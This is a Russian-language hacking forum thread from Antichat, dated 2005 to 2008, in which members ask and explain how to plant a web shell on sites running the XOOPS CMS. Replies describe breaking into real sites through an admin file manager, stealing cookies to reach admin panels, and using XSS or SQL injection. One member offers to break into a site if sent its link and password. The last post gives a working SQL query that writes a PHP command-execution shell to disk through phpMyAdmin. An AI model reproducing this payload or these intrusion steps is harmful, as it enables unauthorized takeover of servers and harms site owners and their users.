ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

шелл через xoops
  #1  
Старый 24.11.2005, 01:15
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию шелл через xoops

вообщем, кто подкажет как залить шелл через xoops?
я с ним не сталкивался, поэтому спрашиваю здесь, мож кто знает?
 
Ответить с цитированием

  #2  
Старый 28.11.2005, 13:18
Аватар для Sn_key
Sn_key
Участник форума
Регистрация: 07.03.2005
Сообщений: 160
Провел на форуме:
418635

Репутация: 30
Отправить сообщение для Sn_key с помощью ICQ
По умолчанию

в мемберки была тема про хупс! там его как нех ломали!
 
Ответить с цитированием

  #3  
Старый 28.11.2005, 15:04
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Цитата:
Сообщение от k1b0rg  
вообщем, кто подкажет как залить шелл через xoops?
я с ним не сталкивался, поэтому спрашиваю здесь, мож кто знает?
Я выкладывал вроде пару шеллов на xoops. Где то ещё пассы на пару сайтов валяются. В общем там всё время подключены разные модули. Ни одного одинакового сайта пока не видел. Я заливал с подключеным файл-менеджером, а без менеджера пока руки не дошли, собственно и не пробовал сильно. Эт, скинь линк и пас в личку, придумаем может что-нибудь.
Tut odin iz nix, moget pomoget http://forum.antichat.ru/showthread.php?p=75562
__________________
Full DNS report

Последний раз редактировалось Azazel; 28.11.2005 в 15:26..
 
Ответить с цитированием

  #4  
Старый 29.11.2005, 07:42
Аватар для africanec
africanec
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567

Репутация: -12
Отправить сообщение для africanec с помощью ICQ
По умолчанию

new_bb стоит? если да то там хсс должна быть
sql-inj на safety-lab.com посмотри
я через форум ломал щас хупс вроде как Run CMs все также осталось там
в админку без пароля только куки украсть
----------
2азазель ето где *.php.ns ты так делал?
ето некатит уже
а вообще больше всего уязвимостей на их форуме
они постоянно там выкладывабт как их сломали логи и т.д. чтобы админы заплатки сделали

Последний раз редактировалось africanec; 29.11.2005 в 07:45..
 
Ответить с цитированием

  #5  
Старый 29.11.2005, 13:00
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Я ж грю. В админке сайта был какой то дурацкий файловый менеджер через который можно было закачивать файлы только в одну папку, типа site.com/xoops/eta/dalekaya/papka/blablabla/tatata/shell.php Я ещё заколебался её искать. Потом я нашёл ещё штук пять таких xopsoв, но админки были одна не похожа на другую и менеджера такого я больше не видел. И форумы тоже там разные были прилеплены.
__________________
Full DNS report
 
Ответить с цитированием

  #6  
Старый 30.04.2007, 17:22
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

столкнулся с этой проблемой(, мож её уже решили, как можно залить шелл из админки.
 
Ответить с цитированием

  #7  
Старый 28.03.2008, 16:40
Аватар для karly_flora
karly_flora
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Если, кто решил эту проблему (залить shell из админки xoops ) отпишитесь плиз...
 
Ответить с цитированием

  #8  
Старый 28.03.2008, 16:48
Аватар для Дюша
Дюша
Banned
Регистрация: 09.12.2007
Сообщений: 301
Провел на форуме:
1796349

Репутация: 174
По умолчанию

идешь в phpmyadmin по стандарту рут
и ебашишь sql запросов вот эту хню
SELECT '<? system("$_GET[cmd]"); ?>' FROM mysql.user INTO OUTFILE 'дира до файла'

или можешь залить полноценный шелл тока замени ' на " во всем сшеле...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
залить шелл через ipb 2.0.4 alakazam Форумы 4 16.11.2005 22:08
Залить шелл через подделку http запросов, на примере ipb 1.3 SURRENDER Форумы 25 13.04.2005 15:37
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Форумы 6 23.12.2004 22:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ